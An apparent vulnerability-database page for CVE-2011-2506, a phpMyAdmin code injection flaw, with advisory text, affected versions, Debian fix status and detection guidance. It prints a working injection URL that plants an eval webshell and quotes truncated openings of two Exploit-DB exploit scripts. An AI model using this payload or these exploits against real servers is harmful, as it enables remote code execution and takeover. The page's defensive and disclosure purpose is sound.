CVE-2011-2506
published 2011-07-14CVE-2011-2506: setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.63%
94.9th percentile
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.
Affected
41 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | phpmyadmin | < phpmyadmin 4:3.4.3.1-1 (bookworm) | phpmyadmin 4:3.4.3.1-1 (bookworm) |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/?_SESSION[ConfigFile][Servers][*/foreach($_GET as $k=>$v)if($k==="eval")eval($v);/*][port]=0&session_to_unset=x&token=<token>↗
- →Detect exploitation attempts by monitoring HTTP requests containing '_SESSION[ConfigFile][Servers][*/' in the query string, which is the session poisoning vector used to inject PHP code between comment delimiters. ↗
- →Alert on POST requests to /setup/config.php with the parameter 'submit_save=Save', which triggers writing the injected code to the config file on disk. ↗
- →Alert on GET requests to /config/config.inc.php with an 'eval' query parameter, which is the webshell execution step after successful code injection. ↗
- →Presence of the MD5 hash 202cb962ac59075b964b07152d234b70 (md5(123)) in HTTP responses from /config/config.inc.php is a reliable indicator of successful code injection exploitation. ↗
- →Monitor for creation or modification of the file config/config.inc.php within the phpMyAdmin web root, as the exploit writes injected PHP code to this path. ↗
- →The exploit requires the 'config' directory to be web-server writable; absence of this directory causes the exploit to abort. Monitor for creation of this directory as a pre-exploitation indicator. ↗
- ·Exploitation requires the web server to have write access to the 'config/' subdirectory within the phpMyAdmin installation. If this directory does not exist or is not writable, the exploit will fail. ↗
- ·Affected versions are phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1; versions at or above these are patched. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
phpMyAdmin vulnerable to static code injection
ghsa·2022-05-14
CVE-2011-2506 [HIGH] CWE-94 phpMyAdmin vulnerable to static code injection
phpMyAdmin vulnerable to static code injection
`setup/lib/ConfigGenerator.class.php` in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.
OSV
phpMyAdmin vulnerable to static code injection
osv·2022-05-14
CVE-2011-2506 [HIGH] phpMyAdmin vulnerable to static code injection
phpMyAdmin vulnerable to static code injection
`setup/lib/ConfigGenerator.class.php` in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.
OSV
CVE-2011-2506: setup/lib/ConfigGenerator
osv·2011-07-14·CVSS 7.5
CVE-2011-2506 [HIGH] CVE-2011-2506: setup/lib/ConfigGenerator
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.
Debian
CVE-2011-2506: phpmyadmin - setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x ...
vendor_debian·2011·CVSS 7.5
CVE-2011-2506 [HIGH] CVE-2011-2506: phpmyadmin - setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x ...
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.
Scope: local
bookworm: resolved (fixed in 4:3.4.3.1-1)
bullseye: resolved (fixed in 4:3.4.3.1-1)
forky: resolved (fixed in 4:3.4.3.1-1)
sid: resolved (fixed in 4:3.4.3.1-1)
trixie: resolved (fixed in 4:3.4.3.1-1)
No detection rules found.
Exploit-DB
phpMyAdmin 3.x - Swekey Remote Code Injection
exploitdb·2011-07-09·CVSS 6.4
CVE-2011-2506 [MEDIUM] phpMyAdmin 3.x - Swekey Remote Code Injection
phpMyAdmin 3.x - Swekey Remote Code Injection
---
':'';?>
.
, )\ .
. ,/) , / ) , )\
)\( /)/( (__( /( / ) __ __ ________ __ __
/ \ ( )| |) \ / | |\ /| | | | | | | | (__)
( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____
\| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | |
| |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|
==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]==============
phpMyAdmin __)|_[_ \__\|____||_|_\|_| |_| |_|
Use responsibly.
':'';
if(php_sapi_name()==='cli'){
if(!isset($argv[1])){
output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
killme();
}
$pmaurl = $argv[1];
}else{
$pmaurl = iss
Exploit-DB
phpMyAdmin3 (pma3) - Remote Code Execution
exploitdb·2011-07-08·CVSS 6.4
CVE-2011-2506 [MEDIUM] phpMyAdmin3 (pma3) - Remote Code Execution
phpMyAdmin3 (pma3) - Remote Code Execution
---
#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
# Requirements: 1. "config" directory must created&writeable in pma directory.
# 2. session.auto_start = 1 in php.ini configuration.
import os,sys,urllib2,re
def usage(program):
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
print "Usage: %s " % program
print "Example: %s http://www.test.com/phpMyAdmin" % program
sys.exit(0)
def main(args):
try:
if len(args) \(.*)\\", urllib2.urlopen(url).read())
if len(result)
No writeups or analysis indexed.
http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2011-July/062719.htmlhttp://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin%3Ba=commit%3Bh=0fbedaf5fd7a771d0885c6b7385d934fc90d0d7fhttp://secunia.com/advisories/45139http://secunia.com/advisories/45292http://secunia.com/advisories/45315http://securityreason.com/securityalert/8306http://typo3.org/teams/security/security-bulletins/typo3-sa-2011-008/http://www.debian.org/security/2011/dsa-2286http://www.exploit-db.com/exploits/17514/http://www.mandriva.com/security/advisories?name=MDVSA-2011:124http://www.openwall.com/lists/oss-security/2011/06/28/2http://www.openwall.com/lists/oss-security/2011/06/28/6http://www.openwall.com/lists/oss-security/2011/06/28/8http://www.openwall.com/lists/oss-security/2011/06/29/11http://www.osvdb.org/73612http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.phphttp://www.securityfocus.com/archive/1/518804/100/0/threadedhttp://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txthttp://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2011-July/062719.htmlhttp://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin%3Ba=commit%3Bh=0fbedaf5fd7a771d0885c6b7385d934fc90d0d7fhttp://secunia.com/advisories/45139http://secunia.com/advisories/45292http://secunia.com/advisories/45315http://securityreason.com/securityalert/8306http://typo3.org/teams/security/security-bulletins/typo3-sa-2011-008/http://www.debian.org/security/2011/dsa-2286http://www.exploit-db.com/exploits/17514/http://www.mandriva.com/security/advisories?name=MDVSA-2011:124http://www.openwall.com/lists/oss-security/2011/06/28/2http://www.openwall.com/lists/oss-security/2011/06/28/6http://www.openwall.com/lists/oss-security/2011/06/28/8http://www.openwall.com/lists/oss-security/2011/06/29/11http://www.osvdb.org/73612http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.phphttp://www.securityfocus.com/archive/1/518804/100/0/threadedhttp://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
2011-07-14
Published